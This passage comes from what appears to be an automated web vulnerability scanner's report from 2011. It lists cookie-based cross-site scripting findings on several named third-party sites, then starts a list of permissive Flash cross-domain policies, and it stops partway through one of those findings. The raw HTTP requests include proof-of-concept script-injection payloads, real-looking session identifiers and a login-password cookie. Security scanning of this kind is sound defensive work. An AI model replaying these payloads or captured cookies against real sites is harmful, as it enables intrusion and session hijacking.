Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&dedf1<script>alert(1)</script>6a1a09355da; ar_p97174789=exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:23:28 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:23:28 2011&prad=253732016&arc=181106347&; expires=Sun 24-Jul-2011 14:23:28 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303741408; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25132

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732016",Pid:"p97174789",Arc:"181106347",Location:
...[SNIP]...
Apr 24 16:50:29 2011&prad=253732016&arc=186884742&', "ar_s_p81479006": '1', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&dedf1<script>alert(1)</script>6a1a09355da', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_p91300630": 'exp=1&initExp=Th
...[SNIP]...

6.85. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p91300630 cookie is copied into the HTML document as plain text between tags. The payload d5a27<script>alert(1)</script>214694deac1 was submitted in the ar_p91300630 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732016&AR_C=181106347 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&d5a27<script>alert(1)</script>214694deac1; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p97174789=exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:23:27 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:23:27 2011&prad=253732016&arc=181106347&; expires=Sun 24-Jul-2011 14:23:27 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303741407; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25132

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732016",Pid:"p97174789",Arc:"181106347",Location:
...[SNIP]...
Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&d5a27<script>alert(1)</script>214694deac1' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|http://Webmail.aol.com/$|http://travel.aol.com/$|http://netscape.aol.com/$|http
...[SNIP]...

6.86. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p97174789 cookie is copied into the HTML document as plain text between tags. The payload e2a7a<script>alert(1)</script>9043e21f1f9 was submitted in the ar_p97174789 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732016&AR_C=181106347 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p97174789=exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&e2a7a<script>alert(1)</script>9043e21f1f9; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:23:28 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:23:28 2011&e2a7a<script>alert(1)</script>9043e21f1f9=&prad=253732016&arc=181106347&; expires=Sun 24-Jul-2011 14:23:28 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303741408; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25132

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732016",Pid:"p97174789",Arc:"181106347",Location:
...[SNIP]...
onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "ar_p97174789": 'exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&e2a7a<script>alert(1)</script>9043e21f1f9', "ar_s_p81479006": '1', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "a
...[SNIP]...

6.87. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_s_p81479006 cookie is copied into the HTML document as plain text between tags. The payload 9ba92<script>alert(1)</script>e69fd29fdd1 was submitted in the ar_s_p81479006 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732016&AR_C=181106347 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p97174789=exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=19ba92<script>alert(1)</script>e69fd29fdd1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:23:30 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:23:30 2011&prad=253732016&arc=181106347&; expires=Sun 24-Jul-2011 14:23:30 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303741410; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25132

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732016",Pid:"p97174789",Arc:"181106347",Location:
...[SNIP]...
ne:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "ar_p97174789": 'exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&', "ar_s_p81479006": '19ba92<script>alert(1)</script>e69fd29fdd1', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p81479006": 'exp=1&ini
...[SNIP]...

6.88. http://forums.manageengine.com/fbw [zdccn cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.manageengine.com
Path:	/fbw

Issue detail

The value of the zdccn cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22270"><script>alert(1)</script>5970609d8e4 was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /fbw?fbwId=49000004360353 HTTP/1.1
Host: forums.manageengine.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/products/security-manager/?gclid=CL-9_6TPt6gCFQTe4AodlRiOCw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); zdccn=067f90c3-40d8-4a59-bdeb-52669063c03a22270"><script>alert(1)</script>5970609d8e4; JSESSIONID=9FFB2A137484D14862CCB036AE627428; __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.4.10.1303732848

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 12:12:05 GMT
Server: Apache-Coyote/1.1
Content-Length: 25959

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>

<link href="//css.zohostat
...[SNIP]...
<input type="hidden" id="zdrpn" name="zdrpn" value="067f90c3-40d8-4a59-bdeb-52669063c03a22270"><script>alert(1)</script>5970609d8e4">
...[SNIP]...

6.89. http://forums.manageengine.com/fbw [zdccn cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.manageengine.com
Path:	/fbw

Issue detail

The value of the zdccn cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd770"-alert(1)-"80d1da2beeb was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /fbw?fbwId=49000004360353 HTTP/1.1
Host: forums.manageengine.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/products/security-manager/?gclid=CL-9_6TPt6gCFQTe4AodlRiOCw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); zdccn=067f90c3-40d8-4a59-bdeb-52669063c03acd770"-alert(1)-"80d1da2beeb; JSESSIONID=9FFB2A137484D14862CCB036AE627428; __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.4.10.1303732848

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 12:12:06 GMT
Server: Apache-Coyote/1.1
Content-Length: 25914

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>

<link href="//css.zohostat
...[SNIP]...
<script>
//For I18N
var zuid = "-1";
var csrfParamName = "zdrpn";
var csrfToken = "067f90c3-40d8-4a59-bdeb-52669063c03acd770"-alert(1)-"80d1da2beeb";
var i18n = new Array();
i18n["zohodiscussions.settings.PleaseEnteravalue"]="The input field is empty!";
i18n["zohodiscussions.generalmessage.enteraValidemailaddre
...[SNIP]...

6.90. https://support.trust-guard.com/index.php [SWIFT_loginemail cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.trust-guard.com
Path:	/index.php

Issue detail

The value of the SWIFT_loginemail cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48cca"><script>alert(1)</script>453c7785034 was submitted in the SWIFT_loginemail cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /index.php?_m=knowledgebase&_a=viewarticle&kbarticleid=1 HTTP/1.1
Host: support.trust-guard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SWIFT_loginpassword=DErwC5IL14LhnSqA7IFm011b3Yjo0HD7Sizs0xht1wo%3D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_loginemail=deleted48cca"><script>alert(1)</script>453c7785034; SWIFT_sessionid40=dwygqqtavu1d244w838kq6z6jm9eea2r; __utma=147269874.1166530582.1303748966.1303748966.1303748966.1; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9;

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:49:50 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/5.2.17
Set-Cookie: SWIFT_sessionid40=deleted; expires=Sun, 25-Apr-2010 19:49:52 GMT; path=/
Set-Cookie: SWIFT_sessionid40=nb8cim55almb9p86x9yk5sbwpqi8fvjz; path=/
Connection: close
Content-Type: text/html
Content-Length: 20833

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-e
...[SNIP]...
<input type="text" name="loginemail" value="deleted48cca"><script>alert(1)</script>453c7785034" class="logintext">
...[SNIP]...

6.91. https://support.trust-guard.com/visitor/index.php [SWIFT_sessionid80 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.trust-guard.com
Path:	/visitor/index.php

Issue detail

The value of the SWIFT_sessionid80 cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aaff5"%3balert(1)//8d66ba3bbd7 was submitted in the SWIFT_sessionid80 cookie. This input was echoed as aaff5";alert(1)//8d66ba3bbd7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /visitor/index.php?_m=livesupport&_a=htmlcode&departmentid=0 HTTP/1.1
Host: support.trust-guard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SWIFT_loginpassword=DErwC5IL14LhnSqA7IFm011b3Yjo0HD7Sizs0xht1wo%3D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_loginemail=deleted; SWIFT_sessionid40=dwygqqtavu1d244w838kq6z6jm9eea2r; __utma=147269874.1166530582.1303748966.1303748966.1303748966.1; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9aaff5"%3balert(1)//8d66ba3bbd7;

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:48:34 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
Cache-Control: max-age=3600, must-revalidate
Expires: Tue, 26 Apr 2011 19:48:37 GMT
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/javascript
Content-Length: 11543

//===============================
// Kayako LiveResponse
// Copyright (c) 2001-2011
// http://www.kayako.com
// License: http://www.kayako.com/license.txt
//===============================

var sessionid_tbpeip8i = "36r5tssjo8ljsterx8m2rwi61oy09zq9aaff5";alert(1)//8d66ba3bbd7";
var country_tbpeip8i = "";
var countrycode_tbpeip8i = "";
var hasnotes_tbpeip8i = "";
var campaignid_tbpeip8i = "";
var campaigntitle_tbpeip8i = "";
var isfirsttime_tbpeip8i = 1;
var timer_tbpeip8i
...[SNIP]...

7. Flash cross-domain policy previous next
There are 61 instances of this issue:

http://195.68.160.134/crossdomain.xml
http://195.68.160.166/crossdomain.xml
http://195.68.160.167/crossdomain.xml
http://195.68.160.40/crossdomain.xml
http://195.68.160.95/crossdomain.xml
http://a.vimeocdn.com/crossdomain.xml
http://ad.afy11.net/crossdomain.xml
http://ad.doubleclick.net/crossdomain.xml
http://ajax.googleapis.com/crossdomain.xml
http://api.facebook.com/crossdomain.xml
http://api.flickr.com/crossdomain.xml
http://b.voicefive.com/crossdomain.xml
http://beacon.securestudies.com/crossdomain.xml
http://bs.mail.ru/crossdomain.xml
http://bs.yandex.ru/crossdomain.xml
http://cdn-01.yumenetworks.com/crossdomain.xml
http://click-here-to-listen.com/crossdomain.xml
http://counter.rambler.ru/crossdomain.xml
http://d1.openx.org/crossdomain.xml
http://d7.zedo.com/crossdomain.xml
http://event.adxpose.com/crossdomain.xml
http://games.mochiads.com/crossdomain.xml
http://goods.adnectar.com/crossdomain.xml
http://goods43.adnectar.com/crossdomain.xml
http://img.en25.com/crossdomain.xml
http://learn.shavlik.com/crossdomain.xml
http://m.adnxs.com/crossdomain.xml
http://map.media6degrees.com/crossdomain.xml
http://mbox5.offermatica.com/crossdomain.xml
http://pda.loveplanet.ru/crossdomain.xml
http://pixel.fetchback.com/crossdomain.xml
http://pixel.quantserve.com/crossdomain.xml
http://pl.yumenetworks.com/crossdomain.xml
http://player.vimeo.com/crossdomain.xml
http://playspal.com/crossdomain.xml
http://pretty.ru/crossdomain.xml
http://r2.mail.ru/crossdomain.xml
http://rbcgaru.hit.gemius.pl/crossdomain.xml
http://rs.mail.ru/crossdomain.xml
http://s0.2mdn.net/crossdomain.xml
http://search.twitter.com/crossdomain.xml
http://widgets.fotocash.ru/crossdomain.xml
http://www.instantengage.com/crossdomain.xml
http://cache.fimservecdn.com/crossdomain.xml
http://demr.opt.fimserve.com/crossdomain.xml
http://desk.opt.fimserve.com/crossdomain.xml
http://gomail.radar.imgsmail.ru/crossdomain.xml
http://googleads.g.doubleclick.net/crossdomain.xml
http://imagesrv.gartner.com/crossdomain.xml
http://img.dt00.net/crossdomain.xml
http://img.imgsmail.ru/crossdomain.xml
http://img.mail.ru/crossdomain.xml
http://js.dt00.net/crossdomain.xml
http://mail.radar.imgsmail.ru/crossdomain.xml
http://mail.ru/crossdomain.xml
http://odnoklassniki.ru/crossdomain.xml
http://oth.dt00.net/crossdomain.xml
http://server.iad.liveperson.net/crossdomain.xml
http://www.gartner.com/crossdomain.xml
https://www.salesforce.com/crossdomain.xml
http://www.livejournal.com/crossdomain.xml

7.1. http://195.68.160.134/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://195.68.160.134
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 195.68.160.134

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:25:37 GMT
Content-Type: text/xml; charset=windows-1251
Content-Length: 208
Last-Modified: Fri, 07 Nov 2008 04:42:33 GMT
Connection: close
Expires: Mon, 25 Apr 2011 15:25:37 GMT
Cache-Control: max-age=3600
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" to-ports="80" />
</cross-domain
...[SNIP]...

7.2. http://195.68.160.166/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://195.68.160.166
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: 195.68.160.166

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:26:43 GMT
Content-Type: text/xml; charset=windows-1251
Content-Length: 208
Last-Modified: Fri, 31 Oct 2008 09:57:14 GMT
Connection: close
Expires: Mon, 25 Apr 2011 15:26:43 GMT
Cache-Control: max-age=3600
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
